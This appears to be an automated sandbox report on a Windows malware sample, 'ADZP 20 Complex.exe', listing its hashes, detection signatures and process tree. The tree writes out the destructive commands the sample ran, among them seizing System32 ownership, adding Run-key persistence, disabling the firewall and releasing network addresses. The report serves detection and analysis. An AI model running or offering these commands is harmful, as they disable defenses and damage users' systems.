Analysis
-
max time kernel
1s -
max time network
276s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
10-05-2024 23:11
Static task
static1
Behavioral task
behavioral1
Sample
ADZP 20 Complex.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral2
Sample
ADZP 20 Complex.exe
Resource
win11-20240508-en
General
-
Target
ADZP 20 Complex.exe
-
Size
106KB
-
MD5
8b6a377f9a67d5482a8eba5708f45bb2
-
SHA1
7197436525e568606850ee5e033c43aea1c3bc91
-
SHA256
6ca11c8b6442db97c02f3b0f73db61f58c96d52e8a880e33abee5b10807d993f
-
SHA512
644e51798399168530b05e629b414dd80cac678bd3c8d4a5d164f55736a2b2fd380d3ca4640f7a034c8f043c06b1527b473e2d17da088d5e97de6ea04120dd72
-
SSDEEP
3072:v7DhdC6kzWypvaQ0FxyNTBfqMXERseQF8:vBlkZvaF4NTBSAesPF8
Malware Config
Signatures
-
Modifies Windows Firewall 2 TTPs 12 IoCs
pid Process 11556 netsh.exe 8752 netsh.exe 12312 netsh.exe 9296 netsh.exe 9436 netsh.exe 12844 netsh.exe 13232 netsh.exe 10196 netsh.exe 12120 netsh.exe 15240 netsh.exe 12868 netsh.exe 8972 netsh.exe -
Possible privilege escalation attempt 64 IoCs
pid Process 5148 takeown.exe 14076 takeown.exe 14860 icacls.exe 5816 takeown.exe 1316 takeown.exe 6044 takeown.exe 2120 icacls.exe 5780 takeown.exe 636 icacls.exe 13820 takeown.exe 12464 takeown.exe 13192 icacls.exe 14772 takeown.exe 12788 takeown.exe 11468 icacls.exe 15256 takeown.exe 9112 icacls.exe 8376 takeown.exe 7928 takeown.exe 11376 icacls.exe 11780 takeown.exe 8092 takeown.exe 12496 icacls.exe 14320 icacls.exe 14772 icacls.exe 10380 takeown.exe 11928 takeown.exe 13464 icacls.exe 14200 icacls.exe 8 icacls.exe 4232 takeown.exe 6408 icacls.exe 9112 takeown.exe 14448 takeown.exe 8076 icacls.exe 4948 takeown.exe 6076 takeown.exe 9456 takeown.exe 15228 icacls.exe 8108 takeown.exe 13280 icacls.exe 6416 takeown.exe 9720 icacls.exe 14064 icacls.exe 9372 icacls.exe 14752 icacls.exe 15172 takeown.exe 14316 takeown.exe 5772 icacls.exe 3928 takeown.exe 4984 takeown.exe 5252 icacls.exe 12708 icacls.exe 8464 takeown.exe 14736 takeown.exe 4340 icacls.exe 3592 icacls.exe 11412 takeown.exe 7128 takeown.exe 15068 takeown.exe 11840 takeown.exe 13984 icacls.exe 5372 icacls.exe 14296 takeown.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation cmd.exe -
Modifies file permissions 1 TTPs 64 IoCs
pid Process 8 icacls.exe 15228 icacls.exe 7928 takeown.exe 9580 icacls.exe 3860 icacls.exe 5148 takeown.exe 6416 takeown.exe 15172 takeown.exe 4948 takeown.exe 15068 takeown.exe 3592 icacls.exe 13388 takeown.exe 11840 takeown.exe 5252 icacls.exe 14200 icacls.exe 12496 icacls.exe 2536 takeown.exe 2832 takeown.exe 8020 icacls.exe 5428 takeown.exe 1180 takeown.exe 636 icacls.exe 9124 icacls.exe 2380 takeown.exe 4508 takeown.exe 13236 takeown.exe 14448 takeown.exe 8092 takeown.exe 10872 takeown.exe 14840 icacls.exe 4584 takeown.exe 11412 takeown.exe 14076 takeown.exe 9848 takeown.exe 13280 icacls.exe 3928 takeown.exe 15256 takeown.exe 11780 takeown.exe 11928 takeown.exe 4764 takeown.exe 5780 takeown.exe 7600 takeown.exe 4232 takeown.exe 12460 icacls.exe 1032 icacls.exe 4340 icacls.exe 14904 takeown.exe 2120 icacls.exe 1184 icacls.exe 6736 icacls.exe 13820 takeown.exe 5372 icacls.exe 8464 takeown.exe 12868 icacls.exe 14772 takeown.exe 8104 icacls.exe 4984 takeown.exe 9500 icacls.exe 6844 takeown.exe 13464 icacls.exe 7128 takeown.exe 14056 takeown.exe 8376 takeown.exe 8540 takeown.exe -
Drops autorun.inf file 1 TTPs 2 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
description ioc Process File opened for modification C:\Users\Admin\AppData\Local\Temp\Autorun.inf cmd.exe File opened for modification C:\Users\Admin\AppData\Local\Temp\Autorun.inf attrib.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\System32\Twain_20.dll cmd.exe File opened for modification C:\Windows\System32\Twain_20.dll cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Gathers network information 2 TTPs 18 IoCs
Uses commandline utility to view network configuration.
pid Process 4764 ipconfig.exe 5284 ipconfig.exe 8908 ipconfig.exe 2312 ipconfig.exe 3240 ipconfig.exe 3092 ipconfig.exe 5876 ipconfig.exe 14452 ipconfig.exe 8948 ipconfig.exe 9848 ipconfig.exe 10688 ipconfig.exe 9624 ipconfig.exe 15068 ipconfig.exe 8848 ipconfig.exe 7328 ipconfig.exe 6036 ipconfig.exe 7852 ipconfig.exe 14436 ipconfig.exe -
Kills process with taskkill 17 IoCs
pid Process 5160 taskkill.exe 7324 taskkill.exe 4788 taskkill.exe 12520 taskkill.exe 15088 taskkill.exe 8804 taskkill.exe 9916 taskkill.exe 14692 taskkill.exe 8648 taskkill.exe 12440 taskkill.exe 13968 taskkill.exe 4868 taskkill.exe 1956 taskkill.exe 2560 taskkill.exe 4704 taskkill.exe 10396 taskkill.exe 15076 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings cmd.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4868 taskkill.exe Token: SeTakeOwnershipPrivilege 4984 takeown.exe -
Suspicious use of WriteProcessMemory 32 IoCs
description pid Process procid_target PID 216 wrote to memory of 1696 216 ADZP 20 Complex.exe 84 PID 216 wrote to memory of 1696 216 ADZP 20 Complex.exe 84 PID 1696 wrote to memory of 4756 1696 cmd.exe 85 PID 1696 wrote to memory of 4756 1696 cmd.exe 85 PID 1696 wrote to memory of 4904 1696 cmd.exe 87 PID 1696 wrote to memory of 4904 1696 cmd.exe 87 PID 1696 wrote to memory of 1908 1696 cmd.exe 89 PID 1696 wrote to memory of 1908 1696 cmd.exe 89 PID 1696 wrote to memory of 2712 1696 cmd.exe 90 PID 1696 wrote to memory of 2712 1696 cmd.exe 90 PID 1696 wrote to memory of 4936 1696 cmd.exe 92 PID 1696 wrote to memory of 4936 1696 cmd.exe 92 PID 1696 wrote to memory of 1016 1696 cmd.exe 93 PID 1696 wrote to memory of 1016 1696 cmd.exe 93 PID 1696 wrote to memory of 4764 1696 cmd.exe 94 PID 1696 wrote to memory of 4764 1696 cmd.exe 94 PID 1696 wrote to memory of 4868 1696 cmd.exe 95 PID 1696 wrote to memory of 4868 1696 cmd.exe 95 PID 2712 wrote to memory of 4984 2712 cmd.exe 96 PID 2712 wrote to memory of 4984 2712 cmd.exe 96 PID 1696 wrote to memory of 2932 1696 cmd.exe 98 PID 1696 wrote to memory of 2932 1696 cmd.exe 98 PID 1696 wrote to memory of 396 1696 cmd.exe 99 PID 1696 wrote to memory of 396 1696 cmd.exe 99 PID 1696 wrote to memory of 4964 1696 cmd.exe 100 PID 1696 wrote to memory of 4964 1696 cmd.exe 100 PID 1696 wrote to memory of 2144 1696 cmd.exe 101 PID 1696 wrote to memory of 2144 1696 cmd.exe 101 PID 1696 wrote to memory of 2044 1696 cmd.exe 102 PID 1696 wrote to memory of 2044 1696 cmd.exe 102 PID 1696 wrote to memory of 5012 1696 cmd.exe 103 PID 1696 wrote to memory of 5012 1696 cmd.exe 103 -
Views/modifies file attributes 1 TTPs 15 IoCs
pid Process 13732 attrib.exe 2932 attrib.exe 8896 attrib.exe 9308 attrib.exe 10320 attrib.exe 5128 attrib.exe 9760 attrib.exe 14360 attrib.exe 7124 attrib.exe 5360 attrib.exe 9064 attrib.exe 5572 attrib.exe 4680 attrib.exe 2668 attrib.exe 8784 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe" cmd /k "taskkill /im cmd.exe /f"1⤵
- Suspicious use of WriteProcessMemory
PID:216 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\46AE.tmp\46AF.tmp\46B0.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe" cmd /k "taskkill /im cmd.exe /f""2⤵
- Checks computer location settings
- Drops autorun.inf file
- Drops file in System32 directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1696 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd3⤵PID:4756
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd3⤵PID:4904
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"3⤵PID:1908
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat3⤵
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4984
-
-
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f3⤵PID:4936
-
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f3⤵PID:1016
-
-
C:\Windows\system32\ipconfig.exeipconfig /release3⤵
- Gathers network information
PID:4764
-
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4868
-
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*3⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:2932
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵PID:396
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵PID:4964
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵PID:2144
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵PID:2044
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵PID:5012
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵PID:1368
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵PID:772
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵PID:5116
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵PID:2260
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵PID:1080
-
-
C:\Windows\system32\msg.exemsg * Virus Detectado3⤵PID:4780
-
-
C:\Windows\system32\msg.exemsg * Virus Detectado3⤵PID:4464
-
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!3⤵PID:2020
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"3⤵PID:2816
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\51C9.tmp\51CA.tmp\51CB.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""4⤵PID:448
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd5⤵PID:5212
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd5⤵PID:5432
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"5⤵PID:5848
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat5⤵PID:5964
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4948
-
-
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f5⤵PID:3744
-
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f5⤵PID:1644
-
-
C:\Windows\system32\ipconfig.exeipconfig /release5⤵
- Gathers network information
PID:3240
-
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f5⤵
- Kills process with taskkill
PID:1956
-
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*5⤵
- Views/modifies file attributes
PID:4680
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵PID:6092
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵PID:4280
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵PID:5136
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵PID:2752
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵PID:2952
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵PID:5192
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵PID:1732
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵PID:2392
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵PID:1088
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵PID:5688
-
-
C:\Windows\system32\msg.exemsg * Virus Detectado5⤵PID:5996
-
-
C:\Windows\system32\msg.exemsg * Virus Detectado5⤵PID:2668
-
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!5⤵PID:5692
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"5⤵PID:6280
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B769.tmp\B76A.tmp\B76B.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""6⤵PID:6548
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd7⤵PID:7908
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd7⤵PID:8160
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"7⤵PID:6480
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat7⤵PID:8284
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r8⤵
- Modifies file permissions
PID:8540
-
-
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f7⤵PID:8588
-
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f7⤵PID:8780
-
-
C:\Windows\system32\ipconfig.exeipconfig /release7⤵
- Gathers network information
PID:8948
-
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f7⤵
- Kills process with taskkill
PID:4788
-
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*7⤵
- Views/modifies file attributes
PID:8784
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:9744
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:9984
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:10208
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:4608
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:6288
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:9936
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:10432
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:10652
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:10904
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:11256
-
-
C:\Windows\system32\msg.exemsg * Virus Detectado7⤵PID:920
-
-
C:\Windows\system32\msg.exemsg * Virus Detectado7⤵PID:5040
-
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!7⤵PID:8556
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵PID:8216
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\3212.tmp\3213.tmp\3214.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵PID:11440
-
-
-
C:\Windows\system32\notepad.exenotepad7⤵PID:10644
-
-
C:\Windows\system32\calc.execalc7⤵PID:11424
-
-
C:\Windows\explorer.exeexplorer.exe7⤵PID:11628
-
-
C:\Windows\system32\mspaint.exemspaint.exe7⤵PID:11832
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵PID:12136
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5645.tmp\5645.tmp\5646.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵PID:12584
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd9⤵PID:8016
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off9⤵
- Modifies Windows Firewall
PID:8752
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"9⤵PID:12520
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat9⤵PID:9272
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Modifies file permissions
PID:13388
-
-
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f9⤵PID:11048
-
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f9⤵PID:2424
-
-
C:\Windows\system32\ipconfig.exeipconfig /release9⤵
- Gathers network information
PID:14436
-
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f9⤵
- Kills process with taskkill
PID:15088
-
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*9⤵
- Views/modifies file attributes
PID:14360
-
-
-
-
C:\Windows\system32\notepad.exenotepad7⤵PID:11816
-
-
C:\Windows\system32\calc.execalc7⤵PID:12380
-
-
C:\Windows\explorer.exeexplorer.exe7⤵PID:12796
-
-
C:\Windows\system32\mspaint.exemspaint.exe7⤵PID:13068
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵PID:764
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\81A9.tmp\81AA.tmp\81BB.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵PID:13468
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd9⤵PID:9268
-
C:\Windows\system32\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"10⤵PID:14288
-
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off9⤵
- Modifies Windows Firewall
PID:12868
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd9⤵PID:13020
-
-
-
-
C:\Windows\system32\notepad.exenotepad7⤵PID:3828
-
-
C:\Windows\system32\calc.execalc7⤵PID:13320
-
-
C:\Windows\explorer.exeexplorer.exe7⤵PID:13632
-
-
C:\Windows\system32\mspaint.exemspaint.exe7⤵PID:13956
-
-
-
-
C:\Windows\system32\notepad.exenotepad5⤵PID:6292
-
-
C:\Windows\system32\calc.execalc5⤵PID:6340
-
-
C:\Windows\explorer.exeexplorer.exe5⤵PID:6364
-
-
C:\Windows\system32\mspaint.exemspaint.exe5⤵PID:6556
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"5⤵PID:6732
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C081.tmp\C082.tmp\C083.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""6⤵PID:6544
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd7⤵PID:9044
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd7⤵PID:9052
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"7⤵PID:8312
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat7⤵PID:8352
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:7928
-
-
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f7⤵PID:8524
-
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f7⤵PID:8624
-
-
C:\Windows\system32\ipconfig.exeipconfig /release7⤵
- Gathers network information
PID:7328
-
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f7⤵
- Kills process with taskkill
PID:8804
-
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*7⤵
- Views/modifies file attributes
PID:8896
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:10200
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:5440
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:6964
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:10012
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:10280
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:10604
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:10892
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:11224
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:8476
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:11140
-
-
C:\Windows\system32\msg.exemsg * Virus Detectado7⤵PID:9852
-
-
C:\Windows\system32\msg.exemsg * Virus Detectado7⤵PID:8768
-
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!7⤵PID:11304
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵PID:11792
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4D0D.tmp\4D0E.tmp\4D0F.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵PID:11268
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd9⤵PID:11148
-
C:\Windows\System32\Twain_20.dllC:\Windows\System32\Twain_20.dll10⤵PID:14444
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\D0B0.tmp\D0B0.tmp\D0B1.bat C:\Windows\System32\Twain_20.dll"11⤵PID:10864
-
-
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off9⤵
- Modifies Windows Firewall
PID:15240
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd9⤵PID:13760
-
-
-
-
C:\Windows\system32\notepad.exenotepad7⤵PID:12100
-
-
C:\Windows\system32\calc.execalc7⤵PID:12188
-
-
C:\Windows\explorer.exeexplorer.exe7⤵PID:12236
-
-
C:\Windows\system32\mspaint.exemspaint.exe7⤵PID:12268
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵PID:2692
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5644.tmp\5645.tmp\5646.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵PID:12572
-
-
-
C:\Windows\system32\notepad.exenotepad7⤵PID:8304
-
-
C:\Windows\system32\calc.execalc7⤵PID:9204
-
-
C:\Windows\explorer.exeexplorer.exe7⤵PID:11252
-
-
C:\Windows\system32\mspaint.exemspaint.exe7⤵PID:10576
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵PID:7460
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5BC2.tmp\5BC3.tmp\5BC4.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵PID:12696
-
-
-
C:\Windows\system32\notepad.exenotepad7⤵PID:4328
-
-
